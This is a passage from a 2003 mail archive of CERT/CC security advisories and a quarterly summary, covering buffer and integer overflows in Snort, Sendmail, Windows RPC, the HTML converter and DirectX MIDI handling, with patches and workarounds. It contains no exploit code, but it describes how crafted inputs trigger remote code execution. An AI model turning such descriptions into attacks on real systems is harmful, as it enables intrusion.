overflow attempts and allows the attacker to insert arbitrary code into the heap. For additional information, please read the Core Security Technologies Advisory located at http://www.coresecurity.com/common/showdoc.php?idx=313&idxseccion=10 This vulnerability affects Snort versions 1.8.x, 1.9.x, and 2.0 prior to RC1. Snort has published an advisory regarding this vulnerability; it is available at http://www.snort.org/advisories/snort-2003-04-16-1.txt. VU#916785 - Buffer overflow in Snort RPC preprocessor (CAN-2003-0033) Researchers at Internet Security Systems (ISS) have discovered a remotely exploitable buffer overflow in the Snort RPC preprocessor module. Martin Roesch, primary developer for Snort, described the vulnerability as follows: When the RPC decoder normalizes fragmented RPC records, it incorrectly checks the lengths of what is being normalized against the current packet size, leading to an overflow condition. The RPC preprocessor is enabled by default. For additional information, please read the ISS X-Force advisory located at http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21951 This vulnerability affects Snort versions 1.8.x through 1.9.1 and version 2.0 Beta. II. Impact Both VU#139129 and VU#916785 allow remote attackers to execute arbitrary code with the privileges of the user running Snort, typically root. In addition, it is not necessary for the attacker to know the IP address of the Snort device they wish to attack; merely sending malicious traffic where it can be observed by an affected Snort sensor is sufficient to exploit these vulnerabilities. III. Solution Upgrade to Snort 2.0 Both VU#139129 and VU#916785 are addressed in Snort version 2.0, which is available at http://www.snort.org/dl/snort-2.0.0.tar.gz Binary-only versions of Snort are available from http://www.snort.org/dl/binaries For information from other vendors that ship affected versions of Snort, please see Appendix A of this document. Disable affected preprocessor modules Sites that are unable to immediately upgrade affected Snort sensors may prevent exploitation of this vulnerability by commenting out the affected preprocessor modules in the "snort.conf" configuration file. To prevent exploitation of VU#139129, comment out the following line: preprocessor stream4_reassemble To prevent exploitation of VU#916785, comment out the following line: preprocessor rpc_decode: 111 32771 After commenting out the affected modules, send a SIGHUP signal to the affected Snort process to update the configuration. Note that disabling these modules may have adverse affects on a sensor's ability to correctly process RPC record fragments and TCP packet fragments. In particular, disabling the "stream4" preprocessor module will prevent the Snort sensor from detecting a variety of IDS evasion attacks. Block outbound packets from Snort IDS systems You may be able limit an attacker's capabilities if the system is compromised by blocking all outbound traffic from the Snort sensor. While this workaround will not prevent exploitation of the vulnerability, it may make it more difficult for the attacker to create a useful exploit. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Apple Computer, Inc. Snort is not shipped with Mac OS X or Mac OS X Server. Ingrian Networks Ingrian Networks products are not susceptible to VU#139129 and VU#916785 since they do not use Snort. Ingrian customers who are using the IDS Extender Service Engine to mirror cleartext data to a Snort-based IDS should upgrade their IDS software. NetBSD NetBSD does not include snort in the base system. Snort is available from the 3rd party software system, pkgsrc. Users who have installed net/snort, net/snort-mysql or net/snort-pgsql should update to a fixed version. pkgsrc/security/audit-packages can be used to keep up to date with these types of issues. Red Hat Inc. Not vulnerable. Red Hat does not ship Snort in any of our supported products. SGI SGI does not ship snort as part of IRIX. Snort Snort 2.0 has undergone an external third party professional security audit funded by Sourcefire. _________________________________________________________________ The CERT/CC acknowledges Bruce Leidl, Juan Pablo Martinez Kuhn, and Alejandro David Weil of Core Security Technologies for their discovery of VU#139129. We also acknowledge Mark Dowd and Neel Mehta of ISS X-Force for their discovery of VU#916785. _________________________________________________________________ Authors: Jeffrey P. Lanza and Cory F. Cohen. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2003-13.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2003 Carnegie Mellon University. Revision History April 17, 2003: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPp7GWGjtSoHZUTs5AQGmlAP+MWnegmA1Qft9AenH7xefffpEDVGDT+sl T4iljwl/ySozE962r40mL4KCszZDPdwRW/MyMA7ZcFaoWbiZc/QrEhTa4A/YYJWC A4kL1cEnM/LiQ7yYBSnJ6DIWDTo+M1PUS9so02M6a0f0e4jpzXZDJ5HmPDdo/aPq NW70cU8gbgs= =Vs2Q -----END PGP SIGNATURE----- From - Tue Jun 3 13:31:13 2003 X-UIDL: 4566 X-Mozilla-Status: 0001 X-Mozilla-Status2: 00000000 Return-Path: Received: from lassen.berkeley.edu (lassen.Berkeley.EDU [128.32.25.102]) by uclink4.berkeley.edu (8.12.9/8.12.3) with ESMTP id h53KTMLE447362; Tue, 3 Jun 2003 13:29:22 -0700 (PDT) Received: from uclink4.berkeley.edu (localhost [127.0.0.1]) by lassen.berkeley.edu (8.12.9/8.12.9) with ESMTP id h53KTLGK013172; Tue, 3 Jun 2003 13:29:21 -0700 (PDT) Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink4.berkeley.edu (8.12.9/8.12.3) with ESMTP id h53KTJOI155726; Tue, 3 Jun 2003 13:29:20 -0700 (PDT) Received: from canaveral.indigo.cert.org (localhost [127.0.0.1]) by canaveral.indigo.cert.org (8.12.8/8.12.8/1.27) with ESMTP id h53KSeYi021447; Tue, 3 Jun 2003 16:28:47 -0400 Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.12.8/8.12.8/Submit/1.1) with SMTP id h53JvThK020511; Tue, 3 Jun 2003 15:57:29 -0400 Date: Tue, 3 Jun 2003 15:57:29 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Summary CS-2003-02 Precedence: list Status: RO X-Status: X-Keywords: X-UID: 82 -----BEGIN PGP SIGNED MESSAGE----- CERT Summary CS-2003-02 June 3, 2003 Each quarter, the CERT Coordination Center (CERT/CC) issues the CERT Summary to draw attention to the types of attacks reported to our incident response team, as well as other noteworthy incident and vulnerability information. The summary includes pointers to sources of information for dealing with the problems. Past CERT summaries are available from: CERT Summaries http://www.cert.org/summaries/ ______________________________________________________________________ Recent Activity Since the last regularly scheduled CERT summary, issued in March 2003 (CS-2003-01), we have seen an integer overflow vulnerability within Sun's XDR Library, multiple vulnerabilities in Lotus Notes and Domino Server, a buffer overflow vulnerability in Sendmail, and multiple vulnerabilities within Snort's preprocessors. For more current information on activity being reported to the CERT/CC, please visit the CERT/CC Current Activity page. The Current Activity page is a regularly updated summary of the most frequent, high-impact types of security incidents and vulnerabilities being reported to the CERT/CC. The information on the Current Activity page is reviewed and updated as reporting trends change. CERT/CC Current Activity http://www.cert.org/current/current_activity.html 1. Integer overflow in Sun RPC XDR library routines An integer overflow vulnerability exists in the xdrmem_getbytes() function distributed as part of the Sun Microsystems XDR library. This overflow may allow a remote attacker to execute arbitrary code on the victim machine. CERT Advisory CA-2003-10: Integer overflow in Sun RPC XDR library routines http://www.cert.org/advisories/CA-2003-10.html Vulnerability Note VU#516825: Integer overflow in Sun RPC XDR library routines http://www.kb.cert.org/vuls/id/516825 2. Multiple Vulnerabilities in Lotus Notes and Domino Multiple vulnerabilities had been reported to affect Lotus Notes clients and Domino servers. Due to the confusion surrounding these vulnerabilities we released an advisory to clairfy the details of the vulnerabilities, the versions affected, and the patches that resolve these issues. CERT Advisory CA-2003-11: Multiple Vulnerabilities in Lotus Notes and Domino http://www.cert.org/advisories/CA-2003-11.html Vulnerability Note VU#206361: Lotus iNotes vulnerable to buffer overflow via PresetFields FolderName field http://www.kb.cert.org/vuls/id/206361 Vulnerability Note VU#355169: Lotus Domino Web Server vulnerable to denial of service via incomplete POST request http://www.kb.cert.org/vuls/id/355169 Vulnerability Note VU#542873: Lotus iNotes vulnerable to buffer overflow via PresetFields s_ViewName field http://www.kb.cert.org/vuls/id/542873 Vulnerability Note VU#772817: Lotus Domino Web Server vulnerable to buffer overflow via non-existent "h_SetReturnURL" parameter with an overly long "Host Header" field http://www.kb.cert.org/vuls/id/772817 Vulnerability Note VU#571297: Lotus Notes and Domino COM Object Control Handler contains buffer overflow http://www.kb.cert.org/vuls/id/571297 Vulnerability Note VU#433489: Lotus Domino Server susceptible to a pre-authentication buffer overflow during Notes http://www.kb.cert.org/vuls/id/433489 Vulnerability Note VU#411489: Lotus Domino Web Retriever contains a buffer overflow vulnerability http://www.kb.cert.org/vuls/id/411489 Vulnerability Note VU#583184: Lotus Domino R5 Server Family contains multiple vulnerabilities in LDAP handling code http://www.kb.cert.org/vuls/id/583184 3. Buffer Overflow in Sendmail There is a remotely exploitable vulnerability in sendmail that could allow an attacker to gain control of a vulnerable sendmail server. Due to a variable type conversion problem, sendmail may not adequately check the length of email address tokens. A specially crafted email message could trigger a stack overflow. CERT Advisory CA-2003-12: Buffer Overflow in Sendmail http://www.cert.org/advisories/CA-2003-12.html Vulnerability Note VU#897604: Sendmail address parsing buffer overflow http://www.kb.cert.org/vuls/id/897604 4. Multiple Vulnerabilities in Snort Preprocessors There are two vulnerabilities in the Snort Intrusion Detection System, each in a separate preprocessor module. Both vulnerabilities allow remote attackers to execute arbitrary code with the privileges of the user running Snort, typically root CERT Advisory CA-2003-13: Multiple Vulnerabilities in Snort Preprocessors http://www.cert.org/advisories/CA-2003-13.html Vulnerability Note VU#139129: Heap overflow in Snort "stream4" preprocessor http://www.kb.cert.org/vuls/id/139129 Vulnerability Note VU#916785: Buffer overflow in Snort RPC preprocessor http://www.kb.cert.org/vuls/id/916785 ______________________________________________________________________ What's New and Updated Since the last CERT Summary, we have published new and updated * Advisories http://www.cert.org/advisories/ * Vulnerability Notes http://www.kb.cert.org/vuls * CERT/CC Statistics http://www.cert.org/stats/cert_stats.html * Training Schedule http:/www.cert.org/training/ ______________________________________________________________________ This document is available from: http://www.cert.org/summaries/CS-2003-02.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright ©2003 Carnegie Mellon University. -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPtz0zmjtSoHZUTs5AQGLYgQAq4zW2wa54HJUPWpho57bLIOlZ2PwwiQ1 NPU2SgRI1HlIHL2N3c+21VJ5IfA2DNpoZKlp0xFUI/oPaitMm+XgyyrFkAeMG23A bXFPchvtsDEQyl9um8C6eSd3gU/XGrNg3tBoBpdvj4WaiRs7/qmkNPPrfo/VB+HP nX2s9pdNJOA= =PnMK -----END PGP SIGNATURE----- From - Mon Jul 14 15:44:11 2003 X-UIDL: 5113 X-Mozilla-Status: 0001 X-Mozilla-Status2: 00000000 Return-Path: Received: from lassen.berkeley.edu (lassen.berkeley.edu [128.32.25.102]) by uclink4.berkeley.edu (8.12.9/8.12.3) with ESMTP id h6ELU0fU072306; Mon, 14 Jul 2003 14:30:00 -0700 (PDT) Received: from uclink4.berkeley.edu (localhost [127.0.0.1]) by lassen.berkeley.edu (8.12.9/8.12.9) with ESMTP id h6ELTwg3027843; Mon, 14 Jul 2003 14:29:59 -0700 (PDT) Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink4.berkeley.edu (8.12.9/8.12.3) with ESMTP id h6ELTu0t072830; Mon, 14 Jul 2003 14:29:57 -0700 (PDT) Received: from canaveral.indigo.cert.org (localhost [127.0.0.1]) by canaveral.indigo.cert.org (8.12.8/8.12.8/1.27) with ESMTP id h6EL7qu7023573; Mon, 14 Jul 2003 17:28:16 -0400 Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.12.8/8.12.8/Submit/1.1) with SMTP id h6EKQDWK021602; Mon, 14 Jul 2003 16:26:13 -0400 Date: Mon, 14 Jul 2003 16:26:13 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2003-14 Buffer Overflow in Microsoft Windows HTML Precedence: list Status: RO X-Status: X-Keywords: X-UID: 83 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2003-14 Buffer Overflow in Microsoft Windows HTML Conversion Library Original issue date: July 14, 2003 Last revised: -- Source: CERT/CC A complete revision history is at the end of this file. Systems Affected * Windows 98 and 98 Second Edition (SE) * Windows NT 4.0 and 4.0 Terminal Server Edition (TSE) * Windows Millennium Edition (Me) * Windows 2000 * Windows XP * Windows Server 2003 Overview A buffer overflow vulnerability exists in a shared HTML conversion library included in Microsoft Windows. An attacker could exploit this vulnerability to execute arbitrary code or cause a denial of service. I. Description Microsoft Windows includes a shared HTML conversion library (html32.cnv). According to Microsoft Security Bulletin MS03-023, "The HTML converter is an extension which allows applications to convert HTML data into Rich Text Format (RTF) while maintaining the formatting and structure of the data as well as the text. The converter also supports the conversion of RTF data into HTML." The HTML conversion library contains a buffer overflow vulnerability that can be triggered by a specially crafted align attribute in an
element. The library can be loaded by any application on the system. For example, Internet Explorer (IE) uses the library to handle HTML data stored in the clipboard. Using script, an attacker can cause IE to copy a crafted
element into the clipboard and load the library. The attacker could accomplish this by convincing a victim to view an HTML web page or HTML email message with IE, Outlook, or Outlook Express in a zone where Active scripting and Allow paste operations via script are enabled. This vulnerability is not limited to IE, Outlook, or Outlook Express. Any program, including non-Microsoft applications, can use the vulnerable library and may present other vectors of attack. Further information is available in VU#823260. Common Vulnerabilities and Exposures (CVE) refers to this issue as CAN-2003-0469. II. Impact An attacker could execute arbitrary code with the privileges of the process that loaded the HTML conversion library. The attacker could also crash the process, causing a denial of service. III. Solution Apply a patch Apply the appropriate patch as specified by Microsoft Security Bulletin MS03-023. Modify Internet Explorer security zone configuration Modify one or both of the following IE security zone settings in the Internet zone and the zone(s) used by Outlook, Outlook Express, and any other application that uses Internet Explorer or the WebBrowser ActiveX control to render HTML: * Set Allow paste operations via script to Disable * Set Active scripting to Disable Either of these changes will prevent attacks that depend on scripting in the IE HTML rendering engine. However, these changes are not complete solutions, and they do not prevent attacks that use other vectors. Note that disabling Active scripting provides defense against other attacks that are outside the scope of this document. Instructions for modifying IE 5 security zone settings can be found in the CERT/CC Malicious Web Scripts FAQ. In IE 6, the High security zone setting includes both of these changes. Appendix A. Vendor Information This appendix contains information provided by vendors. When vendors report new information, this section is updated and the changes are noted in the revision history. If a vendor is not listed below, we have not received their comments. Microsoft Please see Microsoft Security Bulletin MS03-023. Appendix B. References * CERT/CC Vulnerability Note VU#823260 - * Microsoft Security Bulletin MS03-023 - _________________________________________________________________ This vulnerability was publicly reported by Digital Scream. _________________________________________________________________ Feedback can be directed to the author, Art Manion. ______________________________________________________________________ This document is available from: ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2003 Carnegie Mellon University. Revision History July 14, 2003: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPxMNQ2jtSoHZUTs5AQFCcgP/bpRDdnHMt9g2IQAzo34qx12ZX4DKsOkd +UYIZptj7ds/PsQ/icA0JhQITnjsbv8QuXZh8rJ/msapEMs8e/S/cb8OXVM+iDKM I+OHgaoZF57X9waGIx7cqvaRQbC9C7y9agz7QCckteAut0qbxZewOVv0EktUR6mH pszPcxmnuC0= =ajV8 -----END PGP SIGNATURE----- From - Thu Jul 17 10:18:10 2003 X-UIDL: 5172 X-Mozilla-Status: 0001 X-Mozilla-Status2: 00000000 Return-Path: Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink4.berkeley.edu (8.12.9/8.12.3) with ESMTP id h6H5pLUH233560; Wed, 16 Jul 2003 22:51:22 -0700 (PDT) Received: from canaveral.indigo.cert.org (localhost [127.0.0.1]) by canaveral.indigo.cert.org (8.12.8/8.12.8/1.27) with ESMTP id h6H5WxtJ031084; Thu, 17 Jul 2003 01:43:00 -0400 Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.12.8/8.12.8/Submit/1.1) with SMTP id h6H5Go50030123; Thu, 17 Jul 2003 01:16:50 -0400 Date: Thu, 17 Jul 2003 01:16:50 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2003-16 Buffer Overflow in Microsoft RPC Precedence: list Status: RO X-Status: X-Keywords: X-UID: 84 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2003-16 Buffer Overflow in Microsoft RPC Original release date: July 17, 2003 Last revised: -- Source: CERT/CC A complete revision history is at the end of this file. Systems Affected * Microsoft Windows NT 4.0 * Microsoft Windows NT 4.0 Terminal Services Edition * Microsoft Windows 2000 * Microsoft Windows XP * Microsoft Windows Server 2003 Overview A buffer overflow vulnerability exists in Microsoft's Remote Procedure Call (RPC) implementation. A remote attacker could exploit this vulnerability to execute arbitrary code or cause a denial of service. I. Description There is a buffer overflow in Microsoft's RPC implementation. According to Microsoft Security Bulletin MS03-026, "There is a vulnerability in the part of RPC that deals with message exchange over TCP/IP. The failure results because of incorrect handling of malformed messages. This particular vulnerability affects a Distributed Component Object Model (DCOM) interface with RPC, which listens on TCP/IP port 135. This interface handles DCOM object activation requests that are sent by client machines (such as Universal Naming Convention (UNC) paths) to the server." The CERT/CC is tracking this issue as VU#568148. This reference number corresponds to CVE candidate CAN-2003-0352. II. Impact A remote attacker could exploit this vulnerability to execute arbitrary code with Local System privileges or to cause a denial of service. III. Solution Apply a patch Apply the appropriate patch as specified by Microsoft Security Bulletin MS03-026. Restrict access You may wish to block access from outside your network perimeter, specifically by blocking access to port 135/TCP. This will limit your exposure to attacks. However, blocking at the network perimeter would still allow attackers within the perimeter of your network to exploit the vulnerability. It is important to understand your network's configuration and service requirements before deciding what changes are appropriate. _________________________________________________________________ This vulnerability was discovered by The Last Stage of Delirium Research Group. Microsoft has published Microsoft Security Bulletin MS03-026, upon which this document is largely based. _________________________________________________________________ Author: Ian A. Finlay ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2003-16.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2003 Carnegie Mellon University. Revision History July 17, 2003: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPxYuDmjtSoHZUTs5AQFv7wP/WetxU0XdObqmC02+lOSG/aR1lGsMpB0i 9AAilcA21Dd/VO/cD8cAiAnb/pavd7NF+uXM8xDdlCTB7ypME5pKFOn6zk1sc9L9 G+9iOSqFUQbnM496CQRdz+UpDYNN4dT9/bgt239Bpyh2gxGxGIxKKN/cUCQ2kGxr yjsZSjp9hME= =ao29 -----END PGP SIGNATURE----- From - Fri Jul 25 15:52:05 2003 X-UIDL: 5342 X-Mozilla-Status: 0001 X-Mozilla-Status2: 00000000 Return-Path: Received: from lassen.berkeley.edu (lassen.berkeley.edu [128.32.25.102]) by uclink4.berkeley.edu (8.12.9/8.12.3) with ESMTP id h6PML5BP374779; Fri, 25 Jul 2003 15:21:05 -0700 (PDT) Received: from uclink4.berkeley.edu (localhost [127.0.0.1]) by lassen.berkeley.edu (8.12.9/8.12.9) with ESMTP id h6PML3Im017097; Fri, 25 Jul 2003 15:21:04 -0700 (PDT) Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink4.berkeley.edu (8.12.9/8.12.3) with ESMTP id h6PML3f4362806; Fri, 25 Jul 2003 15:21:03 -0700 (PDT) Received: from canaveral.indigo.cert.org (localhost [127.0.0.1]) by canaveral.indigo.cert.org (8.12.8/8.12.8/1.27) with ESMTP id h6PKslu3012277; Fri, 25 Jul 2003 17:25:55 -0400 Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.12.8/8.12.8/Submit/1.1) with SMTP id h6PJ3ZCc009020; Fri, 25 Jul 2003 15:03:38 -0400 Date: Fri, 25 Jul 2003 15:03:35 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2003-18 Integer Overflows in Microsoft Windows DirectX MIDI Library Precedence: list Status: RO X-Status: X-Keywords: X-UID: 85 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2003-18 Integer Overflows in Microsoft Windows DirectX MIDI Library Original issue date: July 25, 2003 Last revised: -- Source: CERT/CC A complete revision history is at the end of this file. Systems Affected * Microsoft Windows systems running DirectX (Windows 98, 98SE, NT 4.0, NT 4.0 TSE, 2000, Server 2003) Overview A set of integer overflows exists in a DirectX library included in Microsoft Windows. An attacker could exploit this vulnerability to execute arbitrary code or to cause a denial of service. I. Description Microsoft Windows operating systems include multimedia technologies called DirectX and DirectShow. From Microsoft Security Bulletin MS03-030, "DirectX consists of a set of low-level Application Programming Interfaces (APIs) that are used by Windows programs for multimedia support. Within DirectX, the DirectShow technology performs client-side audio and video sourcing, manipulation, and rendering." DirectShow support for MIDI files is implemented in a library called quartz.dll. This library contains two vulnerabilities: VU#561284 - Microsoft Windows DirectX MIDI library does not adequately validate Text or Copyright parameters in MIDI files VU#265232 - Microsoft Windows DirectX MIDI library does not adequately validate MThd track values in MIDI files In both cases, a specially crafted MIDI file could cause an integer overflow, leading to incorrect memory allocation and heap corruption. Any application that uses DirectX/DirectShow to process MIDI files may be affected by this vulnerability. Of particular concern, Internet Explorer (IE) uses the Windows Media Player ActiveX control and quartz.dll to handle MIDI files embedded in HTML documents. An attacker could therefore exploit this vulnerability by convincing a victim to view an HTML document, such as a web page or an HTML email message, that contains an embedded MIDI file. Note that in addition to IE, a number of applications, including Outlook, Outlook Express, Eudora, AOL, Lotus Notes, and Adobe PhotoDeluxe, use the WebBrowser ActiveX control to interpret HTML documents. Further technical details are available in eEye Digital Security advisory AD20030723. Common Vulnerabilities and Exposures (CVE) refers to these vulnerabilities as CAN-2003-0346. II. Impact By convincing a victim to access a specially crafted MIDI or HTML file, an attacker could execute arbitrary code with the privileges of the victim. The attacker could also cause a denial of service in any application that uses the vulnerable functions in quartz.dll. III. Solution Apply a patch Apply the appropriate patch as specified by Microsoft Security Bulletin MS03-030. Disable embedded MIDI files Change the Run ActiveX controls and plug-ins security setting to Disable in the Internet zone and the zone(s) used by Outlook, Outlook Express, and any other application that uses the WebBrowser ActiveX control to render HTML. This modification will prevent MIDI files from being automatically loaded from HTML documents. This workaround is not a complete solution and will not prevent attacks that attempt to load MIDI files directly. Instructions for modifying IE security zone settings can be found in the CERT/CC Malicious Web Scripts FAQ. Appendix A. Vendor Information This appendix contains information provided by vendors. When vendors report new information, this section is updated and the changes are noted in the revision history. If a vendor is not listed below, we have not received their comments. Microsoft Please see Microsoft Security Bulletin MS03-030. Appendix B. References * CERT/CC Vulnerability Note VU#561284 - http://www.kb.cert.org/vuls/id/561284 * CERT/CC Vulnerability Note VU#265232 - http://www.kb.cert.org/vuls/id/265232 * eEye Digital Security advisory AD20030723 - http://www.eeye.com/html/Research/Advisories/AD20030723.html * Microsoft Security Bulletin MS03-030 - http://microsoft.com/technet/security/bulletin/MS03-030.asp * Microsoft Knowledge Base article 819696 - http://support.microsoft.com/default.aspx?scid=kb;en-us;819696 _________________________________________________________________ These vulnerabilities were researched and reported by eEye Digital Security. _________________________________________________________________ Feedback can be directed to the author, Art Manion. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2003-18.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. ______________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2003 Carnegie Mellon University. Revision History July 25, 2003: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPyF6V2jtSoHZUTs5AQFGtgP/VJsEVZ1blK04pZhjSIlJuPJJg1PU4Xwi /lvJFdpvkqKrEH27NHBkfJGN/rSs7kinSq6dEsJeenjb3rcDQMd/VdFEm83cF51/ NDyMt4osvtXveYSR1oorbMbSVQ4tF5yItsOchRfZsfigyk3tvzPA1kawuWBxy2KZ Gmjs9RLgmxI= =3ICC -----END PGP SIGNATURE----- From - Thu Jul 31 16:51:21 2003 X-UIDL: 5484 